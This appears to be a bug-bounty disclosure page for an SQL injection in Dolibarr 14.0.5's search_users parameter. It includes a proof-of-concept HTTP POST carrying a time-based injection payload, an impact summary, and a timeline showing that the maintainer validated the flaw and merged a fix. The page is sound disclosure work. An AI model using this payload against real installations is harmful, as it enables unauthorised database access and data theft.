SQL Injection in dolibarr/dolibarr

Valid

Reported on

Jan 9th 2022


Description

The search_users parameter does not sanitise and escape the option parameter before using it in a SQL statement, which could lead to SQL injection.

Proof of Concept

Slow query example:

POST /dolibarr-14.0.5/htdocs/compta/sociales/list.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://dolibarr.host.com/dolibarr-14.0.5/htdocs/
Cookie: DOLSESSID_fccaaf42bd9fa1c7b06bdc9c436940dd=mo7pn9rar97v28ol5a34qe0oa0; 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 478
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: dolibarr.host.com
Connection: Keep-alive

action=list&button_search_x=x&contextpage=sclist&formfilteraction=list&limit=1&pageplusoneold=1&search_amount=the&search_label=the&search_month_lim=7&search_project_ref=the&search_ref=&search_status=the&search_users[]=(select(0)from(select(sleep(0)))a)&search_year_lim=2027&selectedfields=cs.rowid%2Ccs.libelle%2Ccs.fk_type%2Ccs.date_ech%2Ccs.periode%2Cp.ref%2Ccs.fk_user%2Ccs.amount%2Ccs.paye%2C&sortfield=cs.date_ech&sortorder=DESC&token=7911ea6a297ad0d6edb116a22fe7e35ee7e35e

Impact

A successful attack may result the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, write file to server lead to Remote code Execute, or write script to extract data

We are processing your report and will contact the dolibarr team within 24 hours. 19 days ago
We have contacted a member of the dolibarr team and are waiting to hear back 18 days ago
We have sent a follow up to the dolibarr team. We will try again in 7 days. 15 days ago
Laurent Destailleur validated this vulnerability 15 days ago
laladee has been awarded the disclosure bounty
The fix bounty is now up for grabs
Laurent Destailleur confirmed that a fix has been merged on b9b45f 15 days ago
Laurent Destailleur has been awarded the fix bounty